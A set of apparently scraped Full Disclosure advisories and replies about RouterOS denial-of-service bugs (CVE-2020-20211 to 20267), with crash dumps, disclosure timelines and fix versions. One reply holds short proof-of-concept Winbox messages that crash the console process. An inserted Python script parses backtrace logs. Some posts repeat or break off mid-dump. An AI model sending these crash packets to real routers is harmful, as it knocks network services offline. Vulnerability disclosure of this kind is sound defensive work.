Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/05] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20267: Mikrotik RouterOs before 6.47 (stable tree) suffers from a memory corruption vulnerability in the /nova/bin/resolver process. An authenticated remote attacker can cause a Denial of Service due to invalid memory access.

CVE-2020-20225: Mikrotik RouterOs before 6.47 (stable tree) suffers from an assertion failure vulnerability in the /nova/bin/user process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet.

Q C wrote on Wednesday, 9 September 2020 at 21:02:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
> Description of vulnerabilities
> ==
>
> 1. memory corruption
> The resolver process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the
> resolver process due to invalid memory access.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.18-14:38:03.27@0:
> 2020.06.18-14:38:03.27@0:
> 2020.06.18-14:38:03.28@0: /nova/bin/resolver
> 2020.06.18-14:38:03.28@0: --- signal=11
>
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
> 2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018 ebp=0x7fe5fd08 esp=0x7fe5fcc0
> 2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98 ecx=0x77676f00 edx=0x0005
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: maps:
> 2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp 00:0c 995 /nova/bin/resolver
> 2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
> 2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp 00:0c 960 /lib/libgcc_s.so.1
> 2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp 00:0c 944 /lib/libuc++.so
> 2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp 00:0c 950 /lib/libubox.so
> 2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp 00:0c 946 /lib/libumsg.so
> 2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0
> 2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc e5 7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08
> 2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c 00 00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: code: 0x80508f6
> 2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72 04 8b
>
> This vulnerability was initially found in long-term 6.44.6, and was fixed
> in stable 6.47.
>
> 2. reachable assertion failure
> The user process suffers from an assertion failure vulnerability. There is
> a reachable assertion in the user process. By sending a crafted packet, an
> authenticated remote user can crash the user process due to assertion
> failure.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: /nova/bin/user
> 2020.06.04-17:56:52.31@0: --- signal=6
>
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
> 2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200 ebp=0x7fee3790 esp=0x7fee3788
> 2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4 ecx=0x00b4 edx=0x0006
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: maps:
> 2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp 00:0c 1002 /nova/bin/user
> 2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
> 2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp 00:0c 960 /lib/libgcc_s.so.1
> 2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp 00:0c 944 /lib/libuc++.so
> 2020.06.04-17:56:52.31@0: 7769-776ad000 r-xp 00:0c 947 /lib/libucrypto.so
> 2020.06.04-17:56:52.31@0: 776ae000-776b4000 r-xp 00:0c 951 /lib/liburadius.so
> 2020.06.04-17:56:52.31@0: 776b5000-776bd000 r-xp 00:0c 950 /lib/libubox.so
> 2020.06.04-17:56:52.31@0: 776be000-776c1000 r-xp
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20219: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/igmp-proxy process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).

CVE-2020-20262: Mikrotik RouterOs before 6.47 (stable tree) suffers from an assertion failure vulnerability in the /ram/pckg/security/nova/bin/ipsec process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet.

Q C wrote on Thursday, 13 August 2020 at 19:14:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
> Description of vulnerabilities
> ==
>
> 1. NULL pointer dereference
> The igmpproxy process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the
> igmpproxy process due to NULL pointer dereference.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy
> 2020.06.04-17:44:27.12@0: --- signal=11
>
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206
> 2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8 ebp=0x7fa932a8 esp=0x7fa9326c
> 2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x ecx=0x000b edx=0x
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: maps:
> 2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp 00:13 16 /ram/pckg/multicast/nova/bin/igmpproxy
> 2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
> 2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp 00:0c 960 /lib/libgcc_s.so.1
> 2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp 00:0c 944 /lib/libuc++.so
> 2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp 00:0c 950 /lib/libubox.so
> 2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp 00:0c 946 /lib/libumsg.so
> 2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c
> 2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32 a9 7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f
> 2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32 a9 7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: code: 0x8050a8d
> 2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4 0c 0f
>
> This vulnerability was initially found in long-term 6.44.6, and was fixed
> in stable 6.47.
>
> 2. reachable assertion failure
> The ipsec process suffers from an assertion failure vulnerability. There
> is a reachable assertion in the ipsec process. By sending a crafted packet,
> an authenticated remote user can crash the ipsec process due to assertion
> failure.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec
> 2020.06.04-18:25:16.04@0: --- signal=6
>
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246
> 2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200 ebp=0x7f8fa450 esp=0x7f8fa448
> 2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291 ecx=0x0291 edx=0x0006
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: maps:
> 2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp 00:11 42 /ram/pckg/security/nova/bin/ipsec
> 2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
> 2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp 00:0c 960 /lib/libgcc_s.so.1
> 2020.06.04-18:25:16.04@0: 774a7000-774b6000 r-xp 00:0c 944 /lib/libuc++.so
> 2020.06.04-18:25:16.04@0: 774b7000-774b9000 r-xp 00:0c 959 /lib/libdl-0.9.33.2.so
> 2020.06.04-18:25:16.04@0: 774bb000-774d r-xp 00:1f 15 /ram/pckg/dhcp/lib/libudhcp.so
> 2020.06.04-18:25:16.04@0:
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20221: Mikrotik RouterOs before 6.44.6 (long-term tree) suffers from an uncontrolled resource consumption vulnerability in the /nova/bin/cerm process. An authenticated remote attacker can cause a Denial of Service due to overloading the system's CPU.

CVE-2020-20218: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/traceroute process. An authenticated remote attacker can cause a Denial of Service via the loop counter variable.

Q C wrote on Sunday, 10 May 2020 at 10:41:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: until stable 6.45.7 (first vulnerability), until stable
> 6.46.4 (second vulnerability)
> Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second
> vulnerability)
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
> Description of vulnerabilities
> ==
>
> These two vulnerabilities were tested only against the MikroTik RouterOS
> stable release tree when found. Maybe other release trees also suffer from
> these vulnerabilities.
>
> 1. The cerm process suffers from an uncontrolled resource consumption
> issue. By sending a crafted packet, an authenticated remote user can cause
> a high CPU load, which may make the device respond slowly or be unable to
> respond.
>
> 2. The traceroute process suffers from a memory corruption issue. By
> sending a crafted packet, an authenticated remote user can crash the
> traceroute process due to invalid memory access.
>
> Solution
> ==
>
> Upgrade to the corresponding latest RouterOS tree version.
>
> References
> ==
>
> [1] https://mikrotik.com/download/changelogs/stable-release-tree
>

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] CVE-2020-20212 and CVE-2020-20211 have been assigned to these two vulnerabilities.

CVE-2020-20212: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/console process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).

CVE-2020-20211: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from an assertion failure vulnerability in the /nova/bin/console process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet.

Q C wrote on Tuesday, 14 April 2020 at 18:29:

> [Update 2020/04/14] The latest stable release tree 6.46.5 still suffers
> from these two vulnerabilities.
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: through 6.46.5 (stable release tree)
> Fixed Versions: -
> Vendor URL: https://mikrotik.com/
> Vendor Status: not fixed yet
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
> Poc
> ===
> The following pocs are based on the tool routeros (
> https://github.com/tenable/routeros)
>
> 1) memory corruption in console process
>
> WinboxMessage msg;
> msg.set_to(48, 4);
> msg.set_command(0xfe0005);
> msg.add_u32(0xfe000c, -1);
> msg.add_u32(9, 9);
>
> 2) assertion failure in console process
>
> WinboxMessage msg;
> msg.set_to(48, 4);
> msg.set_command(0xfe0005);
> msg.add_u32(0xfe0001, 0);
>
> Disclosure timeline
> ===
> 2019/08/23  reported the 2nd issue to the vendor
> 2019/08/26  reported the 1st issue to the vendor
> 2019/08/28  vendor reproduced the 1st issue and will fix it as soon as
> possible
> 2019/08/30  vendor reproduced the 2nd issue and will fix it as soon as
> possible
> 2019/12/02  notified the vendor the 1st issue still exists in version
> 6.44.6 (2nd issue fixed)
> 2020/01/06  no response from the vendor, and did the initial disclosure
> 2020/04/14  re-tested these two issues against the stable 6.46.5, and
> updated the disclosure
>
> Q C wrote on Monday, 6 January 2020 at 19:32:
>
>> Advisory: two vulnerabilities found in MikroTik's RouterOS
>>
>> Details
>> ===
>>
>> Product: MikroTik's RouterOS
>> Affected Versions: before 6.44.6 (Long-term release tree)
>> Fixed Versions: 6.44.6 (Long-term release tree)
>> Vendor URL: https://mikrotik.com/
>> Vendor Status: fixed version released
>> CVE: -
>> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>>
>> Product Description
>> ==
>>
>> RouterOS is the operating system used on MikroTik's devices, such as
>> switches, routers and access points.
>>
>> Description of vulnerabilities
>> ==
>>
>> These two vulnerabilities were tested only against the MikroTik RouterOS
>> long-term release tree when found. Maybe other release trees also suffer
>> from these issues.
>>
>> 1. The console process suffers from a memory corruption issue.
>> An authenticated remote user can crash the console process due to a NULL
>> pointer dereference by sending a crafted packet.
>>
>> 2. The console process suffers from an assertion failure issue. There is
>> a reachable assertion in the console process. An authenticated remote user
>> can crash the console process due to assertion failure by sending a crafted
>> packet.
>>
>> Solution
>> ==
>>
>> Upgrade to the corresponding latest RouterOS tree version.
>>
>> References
>> ==
>>
>> [1] https://mikrotik.com/download/changelogs/long-term-release-tree
>>
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS

Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team

Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as switches, routers and access points.

Description of vulnerabilities
==

1. memory corruption

The resolver process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the resolver process due to invalid memory access.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.18-14:38:03.27@0:
2020.06.18-14:38:03.27@0:
2020.06.18-14:38:03.28@0: /nova/bin/resolver
2020.06.18-14:38:03.28@0: --- signal=11

2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018 ebp=0x7fe5fd08 esp=0x7fe5fcc0
2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98 ecx=0x77676f00 edx=0x0005
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: maps:
2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp 00:0c 995 /nova/bin/resolver
2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp 00:0c 960 /lib/libgcc_s.so.1
2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp 00:0c 944 /lib/libuc++.so
2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp 00:0c 950 /lib/libubox.so
2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp 00:0c 946 /lib/libumsg.so
2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0
2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc e5 7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08
2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c 00 00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: code: 0x80508f6
2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72 04 8b

This vulnerability was initially found in long-term 6.44.6, and was fixed in stable 6.47.

2. reachable assertion failure

The user process suffers from an assertion failure vulnerability. There is a reachable assertion in the user process. By sending a crafted packet, an authenticated remote user can crash the user process due to assertion failure.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: /nova/bin/user
2020.06.04-17:56:52.31@0: --- signal=6

2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200 ebp=0x7fee3790 esp=0x7fee3788
2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4 ecx=0x00b4 edx=0x0006
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: maps:
2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp 00:0c 1002 /nova/bin/user
2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp 00:0c 944 /lib/libuc++.so
2020.06.04-17:56:52.31@0: 7769-776ad000 r-xp 00:0c 947 /lib/libucrypto.so
2020.06.04-17:56:52.31@0: 776ae000-776b4000 r-xp 00:0c 951 /lib/liburadius.so
2020.06.04-17:56:52.31@0: 776b5000-776bd000 r-xp 00:0c 950 /lib/libubox.so
2020.06.04-17:56:52.31@0: 776be000-776c1000 r-xp 00:0c 948 /lib/libuxml++.so
2020.06.04-17:56:52.31@0: 776c2000-7770e000 r-xp 00:0c 946 /lib/libumsg.so
2020.06.04-17:56:52.31@0: 77714000-7771b000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: stack: 0x7fee4000 - 0x7fee3788
2020.06.04-17:56:52.31@0: 00 20 66 77 00 20 66 77 c8 37 ee 7f 77 60 65 77 06 00 00 00 00 22 66 77 20 00 00 00 00 00 00 00
2020.06.04-17:56:52.31@0: 15 00 00 00 28 38 ee 7f c4 37 ee 7f e4 ea 70 77 01 00 00 00 e4 ea 70 77 15 00 00 00 01 00 fe 00
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: code: 0x7765a55b
2020.06.04-17:56:52.31@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8

This vulnerability was initially found in long-term 6.44.6, and was fixed in stable 6.47.

Solution
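Both crash dumps above follow the same backtrace.log layout, and the quickest way to tell the two bug classes apart when such a dump turns up in a device's logs is to see which mapped module holds the faulting eip: signal 11 with eip inside the process image points at the invalid memory access in the resolver, while signal 6 with eip inside libuClibc is the abort() raised by the failed assertion in the user process. The following triage script is an added example and not part of the advisory or of any MikroTik tool; it parses the layout as posted (including register and map lines the mailer wrapped onto a second line, and truncated tokens such as eax=0x), and the two embedded dumps are constructed from the resolver and user dumps above. The signal-name table is an assumption for the x86 builds shown.

```python
"""Triage helper for RouterOS /rw/logs/backtrace.log dumps (added example).

Parses the posted layout: a 'YYYY.MM.DD-HH:MM:SS.ss@0:' prefix on every
line, then the process path, '--- signal=N', register lines and a 'maps:'
table.  Reports which mapped module contains the faulting eip.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

PREFIX = re.compile(r"^\d{4}\.\d{2}\.\d{2}-\d{2}:\d{2}:\d{2}\.\d+@\d+:\s*")
# start-end perms dev inode [path]; the mailer wrapped some paths onto the
# next line, so the path is optional here and attached in the parser below.
MAP_LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+([rwxp-]{4})\s+(\S+)\s+(\d+)(?:\s+(\S+))?$")
REG = re.compile(r"\b([a-z]{3,6})=0x([0-9a-f]+)")
# Assumed meaning of the signal numbers for the x86 RouterOS builds shown.
SIGNAL_NAMES = {6: "SIGABRT (abort/assertion failure)", 11: "SIGSEGV (invalid memory access)"}


@dataclass
class Mapping:
    start: int
    end: int
    perms: str
    path: str


@dataclass
class CrashReport:
    process: Optional[str] = None
    signal: Optional[int] = None
    registers: Dict[str, int] = field(default_factory=dict)
    maps: List[Mapping] = field(default_factory=list)

    def locate(self, addr: int) -> Optional[Tuple[str, int]]:
        """Return (module path, offset into module) for addr, if it is mapped."""
        for m in self.maps:
            if m.start <= addr < m.end:
                return m.path, addr - m.start
        return None


def parse_backtrace(text: str) -> CrashReport:
    report, in_maps = CrashReport(), False
    for raw in text.splitlines():
        line = PREFIX.sub("", raw.strip())
        if not line:
            continue
        if line.startswith("--- signal="):
            report.signal = int(line.split("=", 1)[1])
        elif line.startswith("maps:"):
            in_maps = True
        elif line.startswith(("stack:", "code:")):
            in_maps = False  # the hex dumps are not needed for attribution
        elif in_maps:
            m = MAP_LINE.match(line)
            if m:
                report.maps.append(Mapping(int(m[1], 16), int(m[2], 16), m[3], m[6] or ""))
            elif line.startswith("/") and report.maps and not report.maps[-1].path:
                report.maps[-1].path = line  # wrapped path continuation
        elif "=0x" in line:
            # Tolerates truncated tokens such as 'eax=0x' seen in the posted dumps.
            for name, val in REG.findall(line):
                report.registers[name] = int(val, 16)
        elif report.process is None and line.startswith("/"):
            report.process = line
    return report


def triage(text: str) -> dict:
    """Summarise one dump: process, signal, faulting eip and the module holding it."""
    r = parse_backtrace(text)
    eip = r.registers.get("eip")
    where = r.locate(eip) if eip is not None else None
    return {"process": r.process, "signal": r.signal,
            "signal_name": SIGNAL_NAMES.get(r.signal, f"signal {r.signal}"),
            "eip": eip, "module": where[0] if where else None,
            "offset": where[1] if where else None}


# Constructed from the resolver dump above; wrapped lines kept as posted.
RESOLVER_DUMP = """\
2020.06.18-14:38:03.28@0: /nova/bin/resolver
2020.06.18-14:38:03.28@0: --- signal=11
2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018
ebp=0x7fe5fd08 esp=0x7fe5fcc0
2020.06.18-14:38:03.28@0: maps:
2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp 00:0c 995
/nova/bin/resolver
2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0
2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc
"""

# Constructed from the user dump above (signal 6, eip inside libc).
USER_DUMP = """\
2020.06.04-17:56:52.31@0: /nova/bin/user
2020.06.04-17:56:52.31@0: --- signal=6
2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4 ecx=0x00b4 edx=0x0006
2020.06.04-17:56:52.31@0: maps:
2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp 00:0c 1002 /nova/bin/user
2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0: code: 0x7765a55b
"""
```

Running triage(RESOLVER_DUMP) attributes eip 0x080508f6 to /nova/bin/resolver at offset 0x88f6, and triage(USER_DUMP) attributes eip 0x7765a55b to /lib/libuClibc-0.9.33.2.so at offset 0x2e55b, which is the split a defender wants when deciding whether a recurring crash is the memory-safety bug or the assertion.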
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS

Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team

Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as switches, routers and access points.

Description of vulnerabilities
==

1. NULL pointer dereference

The igmpproxy process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the igmpproxy process due to NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy
2020.06.04-17:44:27.12@0: --- signal=11

2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206
2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8 ebp=0x7fa932a8 esp=0x7fa9326c
2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x ecx=0x000b edx=0x
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: maps:
2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp 00:13 16 /ram/pckg/multicast/nova/bin/igmpproxy
2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp 00:0c 944 /lib/libuc++.so
2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp 00:0c 950 /lib/libubox.so
2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp 00:0c 946 /lib/libumsg.so
2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c
2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32 a9 7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f
2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32 a9 7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: code: 0x8050a8d
2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4 0c 0f

This vulnerability was initially found in long-term 6.44.6, and was fixed in stable 6.47.

2. reachable assertion failure

The ipsec process suffers from an assertion failure vulnerability. There is a reachable assertion in the ipsec process. By sending a crafted packet, an authenticated remote user can crash the ipsec process due to assertion failure.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec
2020.06.04-18:25:16.04@0: --- signal=6

2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246
2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200 ebp=0x7f8fa450 esp=0x7f8fa448
2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291 ecx=0x0291 edx=0x0006
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: maps:
2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp 00:11 42 /ram/pckg/security/nova/bin/ipsec
2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-18:25:16.04@0: 774a7000-774b6000 r-xp 00:0c 944 /lib/libuc++.so
2020.06.04-18:25:16.04@0: 774b7000-774b9000 r-xp 00:0c 959 /lib/libdl-0.9.33.2.so
2020.06.04-18:25:16.04@0: 774bb000-774d r-xp 00:1f 15 /ram/pckg/dhcp/lib/libudhcp.so
